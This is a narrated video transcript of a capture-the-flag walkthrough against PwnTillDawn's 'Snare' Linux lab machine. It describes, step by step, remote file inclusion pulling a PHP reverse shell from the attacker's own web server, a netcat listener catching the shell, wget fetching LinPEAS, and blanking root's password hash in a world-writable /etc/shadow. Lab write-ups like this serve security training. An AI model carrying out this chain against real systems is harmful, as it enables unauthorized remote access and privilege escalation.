Hey guys, in this video we'll be attempting PwnTillDawn's snare machine, which is actually a Linux machine rated as easy. So we'll take a look and see how it goes. So let's get started. Firstly, let us navigate to our PwnTillDawn's directory. From here, let us create a new directory for our Linux target, which is 10.150.150.18. We'll move into our newly created Linux target directory. And from here, we will start to perform our Nmap enumeration scan. We use Nmap-sc, which actually specifies the use of Nmap scripts so that we'll have more detailed information. There's -sv, which you tell Nmap to do a version scan, and we'll put in a -sv there for a verbose output scan so we know what ports are open along the way. And we'll throw in a -on to actually output and save our Nmap scan into the Nmap file. Let's fire up our command, and right off the bat, we can, with the use of a -v option, we can see that our port 80 and port 22 are open. Wasting no time, let us fire up our Firefox browser and navigate to our Linux machine IP.150.150.18 since port 80 is open. So here is our website, and right off the bat we can see that this website is pretty simple. We are greeted with this landing page, and there are several buttons here. We have the About Us tab and the Contact tab. So carrying further into our web enumeration, what we can do is actually to right click and click on View Page Source. Let us see if there's any interesting information. So we can tell that there's nothing special. There's no hidden comments hidden from the developer from our side. However, if you're alert enough, you may realize that the links from the Home, About Us and Contact tab was actually linked via the page parameter. So for About Us is page equals to about, whereas for Contact is page equals to contact. And that actually should raise suspicion to the local file inclusion vulnerability, which is the vulnerability which occurs due to the use of user-supplied input without proper validation. Which also means if we navigate back to our website and we change the contact here to let's say about, then we would automatically be navigated to the About Us tab. That is incredibly dangerous, because if our user supply input is not properly sanitized, that means that we can actually do a directory transversal using the .. and transverse to read other sensitive file information. So let us test by using .. and navigate to /password file, and we can see if this payload actually works. So press enter. Okay, so unfortunately the payload does not work. Now the reason why the payload does not work is because we can see the /password hashes did not appear on the web page. However, if you recognize, there is actually another type of file inclusion, which is the remote file inclusion vulnerability. So instead of looking at the directory of the target's own file system, we can actually target our own server. So let us type in our own server, and in order to do that, we have to first know the IP address of our own local host. So let us go back to our terminal, and we can type in ifconfig, and there we have our own IP address over here. Let us copy it, and let us type in http:// our IP address, and we can specify any port that we want. Let's say we put in 99, and what we can do here is actually to key in our reverse shell so that it will be able to execute the payload inside the reverse shell. So there are a lot of different ways we can get the reverse shell, and one of it is actually conveniently stored in our Kali machine. So if you have a Kali machine, what you can do is actually type in the command web shells, and you'll be navigated to the web shells folder, because we know that the web page is a PHP application. From the extension you can see index.php. We'll need a PHP reverse shell to execute the commands correctly. So what we will do is to navigate to cd php and when we list all the PHP shells, the one that we'll be looking at is the php-reverse-shell. So we'll copy it, and then we would copy it to our folder. Let's navigate back to our folder. And from here, we have to change the IP address and the port number in our server, in our reverse shell. So from here, our IP address and our own port, we just set it as 1234 for now. Now let's save it using :WQ!! And yeah, so now our reverse shell is ready. What we can do is actually to start up our very own Python server here. So what we can do is python 3 -m http.server, and we just put our port here. So this is to specify the port that we will be using to host our reverse shell. Now that our server has started up, we will navigate to, using the remote file inclusion vulnerability, we will navigate to our own IP address and point to our port that we host our files on, and we will put php-reverse-shell. And remember, we have to set up our own listener to catch the reverse shell connection. So we do netcat-nlvp and 1234 as specified in our reverse shell. Now that it's listening, we will try to catch the reverse shell connection from the target's HTTP server. So let us navigate again, and hopefully this actually works. So go, and yeah, you can see that now we've actually successfully catched the reverse shell from the remote file inclusion vulnerability. Now that we got the target's web shell, what we can do is actually to stabilize and upgrade our reverse shell. Firstly, to find out what version of Python that our target has. So let's say which Python. Okay, so the target does not have Python 2. So what about Python 3? So the target has Python 3. So what we can do is, firstly, we can type Python 3-c import pty and pty.spawn bin/bash and close. So yeah, so now that we can see that we are the identity of www-data, you can see from who am I here. And next, what we can do is firstly to Ctrl-Z to background this reverse shell. We'll press enter. Then on our localhost, what we can do is to type stty raw-echo. And now we're a bit unstable, so what we do is just to put a reset, and we can just foreground it. Now we've pressed enter twice on our keyboard, and now we are in our more stabilized and upgraded reverse shell. So now that we're in here, so let us do some enumeration. So let us see if we can get our first flag. So let's change directory to our home. Normally that's where the user flag is being stored. So cd, so there's the box name ls, and here we go. Here is our first flag, flag1.txt. Now let's move on to our second flag, and in order to do that, we have to escalate our privilege to root. So there are many ways to look at it. To make our lives easier, we'll be using the lean-piece enumeration script for us to find out different ways in which we can privilege escalate our way to root. Now, lean-piece actually stands for Linux Privilege Escalation Awesome Script, and to do that, we will be going back to our local machine. And if you're using Kali, there's actually already a lean-piece command, and will be navigated automatically to the lean-piece folder directory. So the same thing, we will be hosting our Python web server to host our lin piece file. So python 3-m http server 9999. And in our target machine, we'll be transferring and getting the lin piece file to execute on our target machine. So we would use wget, and we would type in http our IP address, which is 10.66.67.134, and the port that we have set up our service at, which is 9999, and our lin piece script, which is linpiece.sh. Now we would press enter. Now notice that we are unable to write to the snare home directory. So what we will do is to cd to our temporary directory, and we would run the above command again. Great. So now that we've successfully received our lin piece file, let us change mode to make it executable for our lin piece file. And now let us execute our lin piece script to find out what ways that we can privilege our way to root. Now that our lin piece script has finished running, let us take a look at the output results that it has detected. So to start off, it is important to note that any files that is actually highlighted with the yellow highlight and red bold underline means that it is actually critical information. So you can see from here, based on the legend, a red/yellow means it is a 95% privilege escalation vector. So we can just take a quick look and see which one is the one that we can prioritize first. So yeah, so from what we can see here is that the /etc/shadow files is actually writable, and this is actually really dangerous. So what we can do here is to actually navigate to our /etc. We can actually what we can do is to do ls-l and /etc/shadow. Now from here we can see that for us or for other users, which is the third, are read, write, and execute, all the other users are able to read, write, and modify this etc shadow file. And what this also means is that we can actually change the hash for the root user, and this makes us being able to escalate to root without having to know what is password. So let us take a look at vim etc shadow. Now that we've opened our etc shadow file, we can see that these text before the first colon is actually the usernames. So we have our root right here, and the second text that comes after the first colon, in between the second colon, is actually the hash of the password. And what this also means is that if we are able to modify and edit and remove the hash for root here, which only have two semicolons side by side, this means that we can change our identity to root without having to input any password. However, there's actually a small slight difficulty where you are not visually able to change due to the shell's limitation, but it's okay. So what we'll be doing is to firstly semicolon and quit this Vim text editor. Now we can actually get our own text editor right here to open it up. And before that, let me just try and get back to this again. Now what we'll do is to highlight this portion, and now we will just paste it here. Now let us remove the password hash in between the first and the second colon. Now that we're done, let us Ctrl A and copy this payload. Now to actually modify this text editor, since we are in a bit of a tricky situation as our keys are not being registered, what we can do is actually to just do a double D to delete the first line, Now what we will do is to hold Shift and O to enter a new line at the top, and we will just paste in our new payload, which is our root without the password hash. And we're done. So let's press escape and quit and save our bin file. Let's check and verify if everything has been done correctly. So we can do @C shadow, and yeah, we can see that our root is now finally without a password hash. And let's try if we are able to switch our user to root using su root, and we are root. So from here, let us see if we are able to traverse to our root directory. So cd root, and we'll list, and here we got our second flag, which is our flag2.txt. I hope this video has been helpful for you. If you find this video helpful, do consider liking this video and subscribe to see more future videos next time. Thank you, and I'll see you soon.